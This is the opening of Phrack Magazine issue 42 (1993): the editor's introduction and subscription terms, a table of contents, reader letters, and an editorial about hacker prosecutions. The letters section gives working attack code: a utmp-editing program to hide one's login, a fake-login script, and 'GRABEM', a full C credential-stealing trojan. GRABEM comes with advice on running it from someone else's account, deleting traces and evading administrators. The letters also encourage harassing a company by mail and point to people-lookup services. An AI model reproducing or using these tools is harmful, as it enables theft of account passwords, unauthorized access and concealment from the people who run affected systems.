home *** CD-ROM | disk | FTP | other *** search
Text File | 1993-03-24 | 453.1 KB | 11,781 lines |
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 1 of 14
-
- Issue 42 Index
- ___________________
-
- P H R A C K 4 2
-
- March 1, 1993
- ___________________
-
- ~ Happy Anniversary Bill Cook & Tim Foley, we love you both! ~
-
-
- Here it is. Amidst all the fanfare and hoopla, Phrack 42 leaps from
- your electronic mail box to infect your very soul. It was just a few
- short years ago on this day that one of the greatest abuses of
- governmental authority took place in the happy little town of Austin,
- Texas. This issue marks the three year anniversary of these raids and a
- hearty hello goes out to Bellcore, The United States Secret Service, and
- the US District Attorney's Office.
-
- As many of you have read previously, or otherwise heard through the
- electronic grapevines, Dispater is no longer editor of Phrack. Your
- new editor, as I was most recently referred to so lovingly by
- my long-time friend John Lee on the alt.cyberpunk Usenet group:
- "the long hair and heavy metal beer drinking Texan that
- Bruce Sterling finds so .. ahem.. 'attractive'." In case you don't get
- the joke, my name is Erikb, and I'm a hacker.
-
- There are a few very distinct differences beginning with this issue of
- Phrack. First and foremost, Phrack is now registered with the Library
- of Congress, and has its own ISSN. Yes, boys and girls, you can
- go to Washington, D.C. and look it up. This adds a new era of
- legitimacy to Phrack in that with such a registration, Phrack should
- never again face any legal challenge that would bypass any paper
- based magazine.
-
- After much deliberation, I have concluded that Phrack
- will no longer provide the world's anti-hacker corporate and
- governmental types (IE: THE MAN) such valuable information for free.
- This will of course have absolutely no effect on YOU, the hackers of the
- world. Phrack has always been, and will always continue to be yours to
- copy and distribute amongst yourselves without limitation, as long as
- the files retain unchanged and intact.
-
- Entities who register their subscriptions to Phrack will be providing
- valuable demographic information to Phrack and its readers on exactly
- who outside our community actually takes an active interest in us.
- Yes, it will also generate some income. The proceeds of all monies
- earned by Phrack will be used to actually compensate contributors for
- articles of interest, and most importantly, help a certain person
- pay off the debt incurred by the twist of fate dealt him through his
- involvement with this publication in the past. I have no interest in
- making any money off of Phrack, as if I were to show a profit, I would
- have to contribute to Tim Foley's expense account via the IRS and I have
- absolutely no desire to fund his antics further than I am already
- forced to.
-
- To keep things honest, any information about the financial affairs
- of Phrack will be made available to anyone who cares to write and
- ask. Thus, we can all see if "THE MAN" is truly as ethical as he would
- have us believe, especially since our rate will be considerably
- less than many magazines (or military screwdrivers).
-
- Now, pertaining to "THE MAN." Phrack does not care for you and the way
- you secretly read and profit from Phrack and then use the information
- contained within its files to oppress its publishers, contributors and
- readers. Henceforth, anyone involved with any ties to a computer
- profession for any corporation, the military or the federal government,
- any person with any ties for any telecommunications company, network
- service provider or interconnect carrier, any person with any ties to
- any law enforcement body, federal, state or otherwise, any elected
- officials, attorneys, accountants or computer consultants of any kind
- must register your subscription immediately. If you are unsure of your
- status with this regard, please contact us. We are going to be VERY
- liberal about "special dispensations" since it is not our intention to
- screw anyone out of a subscription.
-
- -------------------------------------------------------------------------
- READ THE FOLLOWING
-
- IMPORTANT REGISTRATION INFORMATION
-
- Corporate/Institutional/Government: If you are a business,
- institution or government agency, or otherwise employed by,
- contracted to or providing any consultation relating to computers,
- telecommunications or security of any kind to such an entity, this
- information pertains to you.
-
- You are instructed to read this agreement and comply with its
- terms and immediately destroy any copies of this publication
- existing in your possession (electronic or otherwise) until
- such a time as you have fulfilled your registration requirements.
- A form to request registration agreements is provided
- at the end of this file.
-
- Individual User: If you are an individual end user whose use
- is not on behalf of a business, organization or government
- agency, you may read and possess copies of Phrack Magazine
- free of charge. You may also distribute this magazine freely
- to any other such hobbyist or computer service provided for
- similar hobbyists. If you are unsure of your qualifications
- as an individual user, please contact us as we do not wish to
- withhold Phrack from anyone whose occupations are not in conflict
- with our readership.
-
- _______________________________________________________________
-
- Phrack Magazine corporate/institutional/government agreement
-
- Notice to users ("Company"): READ THE FOLLOWING LEGAL
- AGREEMENT. Company's use and/or possession of this Magazine is
- conditioned upon compliance by company with the terms of this
- agreement. Any continued use or possession of this Magazine is
- conditioned upon payment by company of the negotiated fee
- specified in a letter of confirmation from Phrack Magazine.
-
- This magazine may not be distributed by Company to any
- outside corporation, organization or government agency. This
- agreement authorizes Company to use and possess the number of copies
- described in the confirmation letter from Phrack Magazine and for which
- Company has paid Phrack Magazine the negotiated agreement fee. If
- the confirmation letter from Phrack Magazine indicates that Company's
- agreement is "Corporate-Wide", this agreement will be deemed to cover
- copies duplicated and distributed by Company for use by any additional
- employees of Company during the Term, at no additional charge. This
- agreement will remain in effect for one year from the date of the
- confirmation letter from Phrack Magazine authorizing such continued use
- or such other period as is stated in the confirmation letter (the "Term").
- If Company does not obtain a confirmation letter and pay the applicable
- agreement fee, Company is in violation of applicable US Copyright laws.
-
- This Magazine is protected by United States copyright laws and
- international treaty provisions. Company acknowledges that no title to
- the intellectual property in the Magazine is transferred to Company.
- Company further acknowledges that full ownership rights to the Magazine
- will remain the exclusive property of Phrack Magazine and Company will
- not acquire any rights to the Magazine except as expressly set
- forth in this agreement. Company agrees that any copies of the
- Magazine made by Company will contain the same proprietary
- notices which appear in this document.
-
- In the event of invalidity of any provision of this agreement,
- the parties agree that such invalidity shall not affect the validity
- of the remaining portions of this agreement.
-
- In no event shall Phrack Magazine be liable for consequential, incidental
- or indirect damages of any kind arising out of the delivery, performance or
- use of the information contained within the copy of this magazine, even
- if Phrack Magazine has been advised of the possibility of such damages.
- In no event will Phrack Magazine's liability for any claim, whether in
- contract, tort, or any other theory of liability, exceed the agreement fee
- paid by Company.
-
- This Agreement will be governed by the laws of the State of Texas
- as they are applied to agreements to be entered into and to be performed
- entirely within Texas. The United Nations Convention on Contracts for
- the International Sale of Goods is specifically disclaimed.
-
- This Agreement together with any Phrack Magazine
- confirmation letter constitute the entire agreement between
- Company and Phrack Magazine which supersedes any prior agreement,
- including any prior agreement from Phrack Magazine, or understanding,
- whether written or oral, relating to the subject matter of this
- Agreement. The terms and conditions of this Agreement shall
- apply to all orders submitted to Phrack Magazine and shall supersede any
- different or additional terms on purchase orders from Company.
-
- _________________________________________________________________
-
- REGISTRATION INFORMATION REQUEST FORM
-
-
- We have approximately __________ users.
-
- We desire Phrack Magazine distributed by (Choose one):
-
- Electronic Mail: _________
- Hard Copy: _________
- Diskette: _________ (Include size & computer format)
-
-
- Name:_______________________________ Dept:____________________
-
- Company:_______________________________________________________
-
- Address:_______________________________________________________
-
- _______________________________________________________________
-
- City/State/Province:___________________________________________
-
- Country/Postal Code:___________________________________________
-
- Telephone:____________________ Fax:__________________________
-
-
- Send to:
-
- Phrack Magazine
- 603 W. 13th #1A-278
- Austin, TX 78701
- -----------------------------------------------------------------------------
-
-
- As many of you can imagine, this will be very hard to enforce.
- This is not our main concern, as people who choose to ignore
- this stipulation are in direct violation of applicable US
- Copyright laws and therefore are just as unethical and guilty as
- they have always claimed we are.
-
- It would be an ironic turn of events should the FBI actually have to
- conduct raids against companies like Bellcore for harboring illegal
- copies of Phrack Magazine. If, in your travels, you happen to see
- such an occurrence, feel free to let us know. :)
-
- Enjoy the magazine. It is for and by the hacking community. Period.
-
-
- Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
- 3L33t : K L & T K
- News : Datastream Cowboy
- Photography : Restricted Data Transmissions & dFx
- Publicity : (Please, God, no more press)
- Prison Consultant : The English Prankster
- Creative Stimulus : Sandoz, Buena Vista Studios, The Sundays
- Mooks : Dave & Bruce
- Librarian : Minor Threat
- Thanks To : Professor Falken, Vince Niel, Skylar
- Rack, NOD, G. Tenet, Frosty
- No Thanks To : Scott Chasin (who didn't even care)
-
-
- Phrack Magazine V. 4, #42, March 1, 1993. ISSN 1068-1035
- Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
- Nothing may be reproduced in whole or in part without written
- permission of the Editor-In-Chief. Phrack Magazine is made available
- quarterly to the amateur computer hobbyist free of charge. Any
- corporate, government, legal, or otherwise commercial usage or
- possession (electronic or otherwise) is strictly prohibited without
- prior registration, and is in violation of applicable US Copyright laws.
-
- Phrack Magazine
- 603 W. 13th #1A-278
- Austin, TX 78701
-
- phrack@well.sf.ca.us
-
- Submissions to the above email address may be encrypted
- with the following key : (Not that we use PGP or encourage its
- use or anything. Heavens no. That would be politically-incorrect.
- Maybe someone else is decrypting our mail for us on another machine
- that isn't used for Phrack publication. Yeah, that's it. :) )
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.1
-
- mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
- ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
- a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
- tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
- =q2KB
- -----END PGP PUBLIC KEY BLOCK-----
-
-
-
- -= Phrack 42 =-
- Table Of Contents
- ~~~~~~~~~~~~~~~~~
- 1. Introduction by The Editor 14K
- 2. Phrack Loopback / Editorial Page / Line Noise 48K
- 3. Phrack Pro-Phile on Lord Digital 22K
- 4. Packet Switched Network Security by Chris Goggans 22K
- 5 Tymnet Diagnostic Tools by Professor Falken 35K
- 6. A User's Guide to XRAY by NOD 11K
- 7. Useful Commands for the TP3010 Debug Port by G. Tenet 28K
- 8. Sprintnet Directory Part I by Skylar 49K
- 9. Sprintnet Directory Part II by Skylar 45K
- 10. Sprintnet Directory Part III by Skylar 46K
- 11. Guide to Encryption by The Racketeer [HFC] 32K
- 12. The Freedom Of Information Act and You by Vince Niel 42K
- 13. HoHoCon from Various Sources 51K
- 14. PWN by Datastream Cowboy 29K
-
- Total: 474K
-
- Phrack 42 is dedicated to John Guinasso, director of global
- network security, BT North America, without whose immortal comments,
- many would have never been motivated to write.
-
- "If you mess with our network and we catch you -- which we always
- do -- you will go down." (John Guinasso, Information Week, July 13, 1992)
-
- "Hell, WE owned Tymnet before BT did!"
- (Anonymous hacker-type, Random Telephone Call, 1993)
-
- _______________________________________________________________________________
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2a of 14
-
- [-=:< Phrack Loopback >:=-]
- ============================================================================
- !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
- ============================================================================
-
- I 'found' this little C program a few days ago, and runs on most UNIX
- machines I think (As I found it, I cant claim fame for writing it!).
-
- What it does, is change your userid and x25 address to anything of your
- choice. This only affects programs such as 'write' and 'who'. It doesn't
- automatically give you different access rights, so it can only be used
- to disguise your real identity.
-
- Usage
- -----
-
- inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
- inv '' '' (Makes you INVISIBLE on 'who')
-
- Program invis.c
- ---------------
-
- #include <stdio.h>
- #include <utmp.h>
- #include <sys/types.h>
-
- #include <lastlog.h>
-
- main(argc,argv)
- int argc;
- char *argv[];
- {
- FILE *f;
- struct utmp u;
-
- int v=ttyslot(1);
- if(v==-1)
- {
- fprintf(stderr,"Can't find terminal.\n");
- exit(1);
-
- if(argc!=3)
- {
- fprintf(stderr,"Args!\n");
- exit(1);
- }
- f=fopen("/etc/utmp","r+");
- if(f==NULL)
- {
- fprintf(stderr,"Utmp has escaped!\n");
- exit(1);
- }
- if(fseek(f,v*sizeof(u),0)==-1)
- {
- fprintf(stderr,"Garbage utmp\n");
- exit(1);
- }
- if(fread((char *)&u,sizeof(u),1,f)!=1)
- {
- fprintf(stderr,"Write failed\n");
- exit(1);
- }
-
- strncpy(u.ut_name,argv[1],8);
- strncpy(u.ut_host,argv[2],16);
- if(fseek(f,v*sizeof(u),0)==-1)
- {
- fprintf(stderr,"Seek failed\n");
- exit(1);
- }
- fwrite((char *)&u,sizeof(u),1,f);
- fclose(f);
- }
-
- I personaly have not used this program (to hack or for anything else)
- What you do with it is up to you....,
- ________
- Have fun...., !!! ( )____
- ( Alas, life )
- ( is but an )
- ( Aardvaark.. )
- ( __ )
- . (_____) (____)
- * * * * * * * * * * * * * * * * . ? . ()
- * CHEERS_ THEN - _ _ * __ ()
- * ___/_/______|_|___| |__ * / \ ()
- * |________ _______| |__| * |_ _|
- * / / | | | | | | * |(0)||(0)|
- * / /___ | | | | | | * /|_ \/ _|\
- * /___ / | | | | | | * || | == | ||
- * / / | | \ \__/ / * || \____/ ||
- * / / |_| \____/ * ///\ !! /\\\
- *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
-
- -------------------------------------------------------------------------------
-
- I am interested in getting in contact with hackers in Nord Italy
- (I am located in Torino). Do you know anybody ?
-
- Can you help TheNewHacker ??
-
- Thanks
-
- TheNewHacker
-
- [Editor: Actually, we are in the process of recruiting people to
- write for a compilation file on the hacking scenes in countries
- around the world. One person is working on Italy. Perhaps when
- this file is completed, you will be able to network through that
- information.
- If anyone in a country other than America is interested in
- contributing to this effort, please write us at:
- phrack@well.sf.ca.us ! ]
-
- -----------------------------------------------------------------------------
-
-
- hello, i must say i love your publication. I have a little kind of
- hack/phreak for you guys.
-
- When you approach a Red light, preferably at night with few cars around,
- continually flash your bright lights. This tricks the light into believing
- this a cop waiting behind traffic at the light thus changing the light after
- about 10 flashes. I discovered that after seeing several police officers turn
- on their lights before they hit lights and was amazed on how easily the light
- changed. If you have say, a Mag-lite the trick works if you point directly
- at the top of the post-light and the ones hanging right above red on verticals
- and right above yellow on horizontals.
-
- hope this helps etc. (i fucking hate those damn red lights)
-
- Dave.
-
- [Editor: I've actually tried this. It works on most major
- intersections]
-
- -----------------------------------------------------------------------------
-
- Hallo !
- I'd like to make just some addition to the APPENDIX A of the
- Racketeer's article "The POWER of Electronic Mail" - there are
- new guys in InterNET -> Russians (!). They have the awful
- connection, but it's cool team. So, add :
-
- .su kremvax.hq.demos.su
-
- And one more note, in the SMTP installed on the Sun Station I'm working
- on there isn't command TICK, but exist some strange like RSET and
- EXPN.
- Spy
-
- P.S. Sorry for my bad English.
-
- [Editor: Russia has a lot of computers online these days. Look for
- more on the Russian Internet in upcoming Phracks!]
-
- -----------------------------------------------------------------------------
-
- There is another, much simpler way to expand your password collection,
- other than tty spoofing. Why not just run a program that simulates the
- login process, and then leave it running on the console for an unsuspecting
- victim? A simple example is below. Execute by typing getpass:logout.
-
- --------File: getpass----------
- LOGIN=""
- PASSWD=""
- clear
- echo -n "login: "
- read LOGIN
- echo "$LOGIN" >name
- sleep 3
- echo -n "Password:"
- read PASSWD
- echo "$PASSWD" >password
- echo
- echo -n "Login incorrect"
- -------------------------------
-
- The only problem I have is that I don't know how to make it so that
- the password, when entered, isn't shown on the screen. I'm sure you
- can come up with a solution.
-
-
- [Editor: actually, someone kinda did. See the next letter]
-
- -----------------------------------------------------------------------------
-
- A Better UNIX Password Grabber
- by The K-Man
-
-
- I blame it entirely on boredom. Well, that and an acute case of end-
- of-semester neural gridlock. I was sitting in the lab a couple of years
- ago, my head leaning against a Sparc-2 display, my index finger hitting the
- return key over and over again at the login prompt. It was all my mind and
- body were capable of at the time. Then a little thought formed in the back
- of my mind: "You know, it would be pretty damn easy to write a program to
- imitate the behavior of this screen while grabbing user id's and passwords."
- So I logged in and started coding. Then I thought to myself, "You know, with
- a few extra lines of code and a couple of tricks, I could make this little
- guy almost completely undetectable and untraceable while running." So I
- coded some more. A couple of hours later, out popped the following
- program:
-
- ---------------------------- Cut Here -----------------------------------
-
- /*----------------------------------------------------------------------+
- | GRABEM 1.0 by The K-Man |
- | A Cute little program to collect passwords on the Sun workstations. |
- +----------------------------------------------------------------------*/
-
- #define PASSWORD "Password:"
- #define INCORRECT "\nLogin incorrect"
- #define FILENAME ".exrc%"
-
- #include <stdio.h>
- #include <signal.h>
-
-
- /*-----------------------------------------------------------------------+
- | ignoreSig |
- | |
- | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. |
- +-----------------------------------------------------------------------*/
- void ignoreSig ()
- {
- return;
- }
-
-
- /*-----------------------------------------------------------------------+
- | Main |
- +-----------------------------------------------------------------------*/
- main()
- {
-
- char name[10], /* users name */
- password[10]; /* users password */
-
-
-
- int i, /* loop counter */
- lab, /* lab # you're running on */
- procid; /* pid of the shell we're under */
-
- FILE *fp; /* output file */
-
-
- /*-------------------------------------------------------------------+
- | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) |
- | signals so the program doesn't stop and dump back to the shell. |
- +-------------------------------------------------------------------*/
- signal (SIGINT, ignoreSig);
- signal (SIGTSTP, ignoreSig);
- signal (SIGQUIT, ignoreSig);
-
- /*-------------------------------------------------------------------+
- | Get the parent pid so that we can kill it quickly later. Remove |
- | this program from the account. |
- +-------------------------------------------------------------------*/
- procid = getppid();
- system ("\\rm proj2");
-
- /*-------------------------------------------------------------------+
- | Ask for the lab # we're running on. Clear the screen. |
- +-------------------------------------------------------------------*/
- printf ("lab#: ");
- scanf ("%d", &lab);
- for (i=1; i<40; i++)
- printf ("\n");
- getchar();
-
- /*-------------------------------------------------------------------+
- | Outer for loop. If the name is <= 4 characters, it's probably not |
- | a real id. They screwed up. Give 'em another chance. |
- +-------------------------------------------------------------------*/
- for(;;)
- {
- /*---------------------------------------------------------------+
- | If they hit return, loop back and give 'em the login again. |
- +---------------------------------------------------------------*/
- for (;;)
- {
- printf("lab%1d login: ",lab);
- gets (name);
-
- if (strcmp (name, "") != 0)
- break;
- }
-
- /*---------------------------------------------------------------+
- | Turn off the screen echo, ask for their password, and turn the |
- | echo back on. |
- +---------------------------------------------------------------*/
- system ("stty -echo > /dev/console");
- printf(PASSWORD);
- scanf("%s",password);
- getchar();
- system ("stty echo > /dev/console");
-
-
- /*---------------------------------------------------------------+
- | Write their userid and password to the file. |
- +---------------------------------------------------------------*/
- if ( ( fp = fopen(FILENAME,"a") ) != NULL )
- {
- fprintf(fp,"login %s has password %s\n",name,password);
- fclose(fp);
- }
-
- /*---------------------------------------------------------------+
- | If the name is bogus, send 'em back through |
- +---------------------------------------------------------------*/
- if (strlen (name) >= 4)
- break;
- else
- printf (INCORRECT);
- }
-
- /*-------------------------------------------------------------------+
- | Everything went cool. Tell 'em they fucked up and mis-typed and |
- | dump them out to the REAL login prompt. We do this by killing the |
- | parent process (console). |
- +-------------------------------------------------------------------*/
- printf (INCORRECT);
- kill (procid, 9);
- }
-
- ---------------------------- Cut Here -----------------------------------
-
-
- HOW IT WORKS
-
- You can probably figure this out by reading the code, but I thought I'd
- just add some comments on why I did what I did.
-
- The first thing is does is install the signal handler. All it does is trap
- SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
- this baby is running on can't kill it with a keystroke. Next, it gets the
- parent process ID. We'll use this later to kill it off quickly. Then it
- proceeds to erase the executable file. Sysadmins can't find a trojan horse
- program that isn't there.
-
- >From here it goes on to imitate the login and password prompts. You'll
- probably have to change the code to get it to imitate the login process on
- your particular machine.
-
- When it gets a userid and password, it appends them to an existing file in
- the account. I chose the .exrc, but any dot file will work. The point being
- to use a file that already exists and should be in the account. Don't leave
- any extra suspicious files lying around.
-
- After it writes the uid and password to the file, it bumps the user back
- to the real login prompt by killing off the shell that was the parent process
- of the program. The cut is almost instantaneous; the user would have to be
- inhumanly observant to notice the transition.
-
-
- HOW TO USE
-
- Well, first you need an account to run it from. If your site has guest accounts,
- you've got it made. If not, I'd suggest using a little social engineering to
- get one other person's account. With that account and the program, you can grab
- access to many more. I wouldn't recommend running it from an account that has
- your name on it. That just makes it a little more dangerous than it needs to be.
- Of course, if the sysadmin happens to catch the program running on your login,
- you can always claim to know nothing. Say someone else must have gotten your
- password and is using your account to escape detection. He might buy it. But
- if you have the source for the program sitting somewhere in your account, and
- they find it, you're fucked. So it's best to use someone else's account for
- the job.
-
- After you've gotten the account you'll be running it from, you'll need to get
- the program in that account somehow. I started off by keeping a copy of the
- source somewhere it my account, named with something innocuous and hidden
- among bunches of source files, but I got paranoid and started hauling the source
- around with me on a bar floppy. Do whatever suits your level of paranoia.
-
- Copy the source to the account you'll be running it from and compile it.
- Trash the source, and name the program something that won't stand out in a
- ps list. selection_svc is a nice innocuous name, and it appears everywhere.
- Do a ps on one of your machines and look for processes that hang around for
- a long time. You might want to hide it as a daemon. Be creative.
-
- Now run the program and sit back and wait. Or leave and come back later.
- When you know that someone has tried to log on to your booby trapped machine,
- log back into the account you borrowed to run the program in and vi or emacs (if
- you're that kind of person) out the captured userid and password. Simple as
- that.
-
- Note that the two times that you stand the greatest chance of being caught
- are when you first compile and run the program and when you retrieve your
- captured uid and passwords. There's the remote chance that someone might see
- you at work and see what you're doing, but it's not very likely. If you start
- acting all paranoid you'll draw more attention to yourself than you would have
- gotten in the first place. If your site has dialup lines, you might want to do
- a dialin to retrieve the passwords. Or you might prefer to do it in person.
- All depends on your paranoia quotient which you think is more secure, I guess.
-
-
- TIPS
-
- Be careful which dot files you use. I chose the .exrc because it was something
- that wasn't used often at our site. If you chose the .cshrc or other frequently
- accessed file, put a # before the uid and password you write to that file. That
- way, when that dot file is sourced, it'll treat that line as a comment and not
- spit out an error message that could cause suspicion.
-
- Try to run the program at a time when you know there will be heavy machine
- usage. That way you'll trap something quick. The longer your program
- runs, the greater the chance it will be found.
-
- Don't be greedy. Run on only one or two machines at a time. And if you run
- on more than one machine, run out of a different account on each one. Again,
- the more you put out there, the better the chance that at least one will be
- found.
-
-
- PARTING NOTE
-
- The morning after I wrote this program was the first time I got to use it. I
- set it running on a guest account, the went to a machine across the room to
- do some legitimate work. One of my friends walks in shortly after that, and
- we start shooting the shit. A minute or two later, the sysadmin walks in, sits
- down, and logs in to the machine I ran the program on. I came really close to
- dropping my fudge right then and there. The only thing running through my
- mind was "Either I'm totally fucked, or I have root." Turned out it was choice
- B. Too bad the guy changed his password once a week, and I wasn't smart enough
- to fix it so that I would see the change. Oh well, I had fun for a week though.
- There were quite a few interesting e-mail messages sent back and forth that week.
- I think the best one was the one from our (male) department head to one of our
- radical she-male hard-core no-damn-gifs feminist female professors, detailing
- all the perverted sexual acts that he would like to perform with and on her. :)
-
- Anyway, have fun with the program. Maybe I'll get a chance to come up with
- some more cool UNIX programs in the future.
-
-
- Later,
- K-Man
-
- -----------------------------------------------------------------------------
-
- In a recent issue of PHRACK you had some article or loopback about
- getting information about people via modem. I am somewhat interested in
- this and could use this information. I have a friend who is a part-time
- bounty hunter and could use such information to track people down.
- Could you please send me some information about who to contact to find out
- this information. What I could REALLY use is an on-line up-to-date
- phone/address book that I could call to find out anybody's address. Is
- there such a thing? If you have any information please e-mail me, since I
- am unable to get your mag on a regular basis. Thanx a mil!
-
- Scarface
-
- [Editor: Actually there are quite a large number of databases that keep
- information on everyone. There is TRW, Equifax, TransUnion,
- Information America and NAI just to name a few. Many of these
- services are very expensive, but even services like CompuServe
- allow users to look up people all over America using
- PhoneFile which compiles data from all kinds of public
- records. Nexis can allow you to look up real estate data on
- just about anyone with loans on their houses. Every public
- utility and department of motor vehicles provides information
- on their records, and many are online.
-
- A good book to read about this kind of thing is
-
- Privacy For Sale
- Jeffrey Rothfeder
-
- Simon & Schuster
- $22.00]
- -----------------------------------------------------------------------------
- THE GOLDEN ERA REBORN!
-
- Relive the thrill of the golden era of hacking through our exclusive
- collection of BBS messages. Our collection contains posts from
- over 40 of the most popular hack/phreak BBSes of all time.
- Experience the birth of the computer underground again from your
- own computer with this collection of original posts from bulletin
- boards like:
-
- * 8BBS *
- * OSUNY *
- * PLOVERNET *
- * THE LEGION OF DOOM *
- * BLACK ICE PRIVATE *
- * THE PHOENIX PROJECT *
-
- And many more...
-
- Messages are available in many computer formats:
- IBM
- Amiga
- Macintosh
-
- For more information, please contact LOD Communications
-
- email: lodcom@mindvox.phantom.com
-
- US Mail: LOD Communications
- 603 W. 13th St.
- Suite 1A-278
- Austin, TX 78701
-
- Voice Mail: 512-448-5098
- -----------------------------------------------------------------------------
-
- You might like this one...
- --bob
- ****************************************
- I just saw a transcript of a press conference given by
- Secret Service Agent Frericks, in Lubbock last December.
-
- here is a brief extraction...
-
- FRERICKS: Um hm. This is a major nation wide, world wide problem from
- an industry point of view with tremendous losses in funds tremendous
- losses of money. the VAX account at the University is a way to get
- into numerous other research accounts or Internet which is the ...you
- get onto Internet you can talk to anybody else who is on Internet
- anywhere in the world which these kids were talking to Belgium, and
- Israel and Australia and they can do that just by this, thus avoiding
- long distance phone calls. But most of the people on Internet I mean
- on the VAX are there legitimately for research purposes they can go to
- Mayo and get a file if they're a med student and they also get one of
- these pamphlets if they get, like the Department of Engineering gives
- out an account number just for that semester, the professor would give
- it out so you can use the VAX well they also get one of those
- pamphlets that explains what the rules are and the instructor spends a
- good bit of time the first couple of classes going over computer
- etiquette, computer rules.
-
- [Editor: Another of America's finest.]
-
- -----------------------------------------------------------------------------
-
-
- I typed this because of the mention of Software Security International in
- the article "More than $100,000 in Illegal Software Seized" in Rambone's
- Pirates Cove in Phrack 41.
- He mentioned that they were the investigators that finally brought down
- APL. I am not only familiar with that, a past friend of mine was
- there when the Marshalls took the board. He was there as representative of
- SSI.
- The best part that Rambone didn't know, was that they couldn't get into
- APL to verify the existence of the software, until they got the password
- breaker from Novell. So in essence, they looked like some dumb fools.
- They didn't have any idea on how to approach the network.
-
- Software Security International Can be reached at...
- 1-800-724-4197
-
- 2020 Pennsylvania Avenue N.W.
- Suite 722
- Washington, D.C. 20006-1846
-
- That is of course if they finally have gotten off the ground. Last I Heard (2-3
- months ago) they were still having trouble getting Financial Backing. They did
- the APL Bust for nothing, just to prove they could do it. They are also on a
- lot of other BBS's around America. So as a warning to other sysops, Cover your
- Ass.
-
- You could rack up some serious negative cash flow by sending tons of
- mail to the box above, then it gets Airborne'd to Washington State.
-
- see ya
-
- [Editor: I think it might be a good idea to send them a few postcards
- every day for the next few weeks. Just to stay in touch.]
- -----------------------------------------------------------------------------
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2b of 14
-
- [-=:< Editorial >:=-]
-
- Before I jump upwards onto my soapbox and spew forth a meaty
- editorial I would like to relay something to the readers of Phrack.
- The following is a transcript of John Lee's (Corrupt's) confession
- to the charges facing him. (From Security Insider Report, Jan. 1993)
-
- What follows is in my opinion a very poor attempt at a plea-bargain,
- and obviously induced by attorney coercion. I must wonder what John
- was thinking when he agreed to this admission.
- ======================================================================
-
- I agreed with others to violate various laws related to the use of
- computers. I agreed to do the following:
-
- 1) I agreed to possess in excess of fifteen passwords which
- permitted me to gain access to various computer systems
- including all systems mentioned in the indictment and others.
- I did not have authorization to access these systems. I knew
- at the time that what I did was wrong.
-
- 2) I used these access devices and in doing so obtained the value of time
- I spent within these systems as well as the value of the passwords
- themselves which I acknowledge was more than $1000.
-
- 3) I intentionally gained access to what I acknowledge are Federal interest
- computers and I acknowledge that work had to be done to improve the
- security of these systems which was necessitated by my unauthorized
- access.
-
- 4) I was able to monitor data exchange between computer systems and by
- doing so intentionally obtained more passwords, identifications and
- other data transmitted over Tymnet and other networks.
-
- 5) I acknowledge that I and others planned to share passwords and
- transmitted information across state boundaries by modem or telephone
- lines and by doing so obtained the monetary value of the use of the
- systems I would otherwise have had to pay for.
-
- Among the ways I and others agreed to carry out these acts are the following:
-
- 1. I was part of a group called MOD.
-
- 2. The members of the group exchanged information including passwords
- so that we could gain access to computer systems which we were not
- authorized to access.
-
- 3. I got passwords by monitoring Tymnet, calling phone company
- employees and pretending to be computer technicians, and using
- computer programs to steal passwords.
-
- I participated in installing programs in computer systems that would give
- the highest level of access to members of MOD who possessed the secret
- password.
-
- I participated in altering telephone computer systems to obtain
- free calling services such as conference calling and free billing
- among others.
-
- Finally, I obtained credit reports, telephone numbers and addresses
- as well as other information about individual people by gaining access
- to information and credit reporting services. I acknowledge that on
- November 5, 1991, I obtained passwords by monitoring Tymnet.
-
- I apologize for my actions and am very sorry for the trouble I have
- caused to all concerned.
-
- John Lee
-
-
- ==========================================================================
-
-
- This issue I would like to call attention to what I consider to be
- a very pressing issue. There has always been a trend to pad the
- amount of dollar damages incurred to any victim of a hacker attack.
- I personally feel that the blame is never directed at the true guilty
- parties.
-
- Certainly, if someone is caught breaking into a system, then they are
- surely guilty of some form of electronic trespass. I will also
- concede that such a person may or may not be guilty of other crimes
- based upon their actions once inside that system. What I have the
- most problems dealing with is the trend to blame the hacker for any
- expenditures needed to further secure the system.
-
- With this mindset, why should any corporation bother to add any
- security at all? Why not just wait until someone happens across
- a few poorly secured sites, nab them, and claim damages for the
- much needed improvements in security?
-
- The worst culprits in this type of behavior has been the RBOCs. As was
- seen with the supposed damages incurred for the distribution of the
- "911 document" and most recently with the $370,000 damages supposedly
- incurred by Southwestern Bell resulting from the alleged activities
- of those in MOD.
-
- Perhaps this figure does have some basis in reality, or perhaps it is
- just an arbitrary figure dreamed up by a few accountants to be used
- at year end to explain some losses in the corporate stock report.
- Most often figures such as this factor in such ridiculous items as
- the actual system hardware penetrated. I can hardly see the relevance
- of such a charge.
-
- Even if these charges are to be believed, why isn't the blame being
- evenly distributed? Why aren't stockholders crying for the heads of
- system administrators, MIS managers and CIOs? These are the people who
- have not adequately done their jobs, are they not? If they had expended
- a bit of time, and a small amount of capital, the tools exist to make
- their systems impervious to attack. Period.
-
- If I had an investment in a company such as Southwestern Bell, I would be
- outraged that the people I was employing to perform data security
- functions were not apt enough to keep a group of uneducated gangsters
- out of their switching systems. Why haven't there been any emergency
- meetings of shareholders? Why isn't anyone demanding any changes in policy?
- Why is everyone still employed?
-
- Not to blame Southwestern Bell too harshly, they were sorely outclassed
- by MOD, and had absolutely no way to cope with them. Not only because MOD
- were competent telco hackers, but because Southwestern Bell's network
- service provider had given them free reign.
-
- Southwestern Bell's packet switched network, Microlink II, was designed
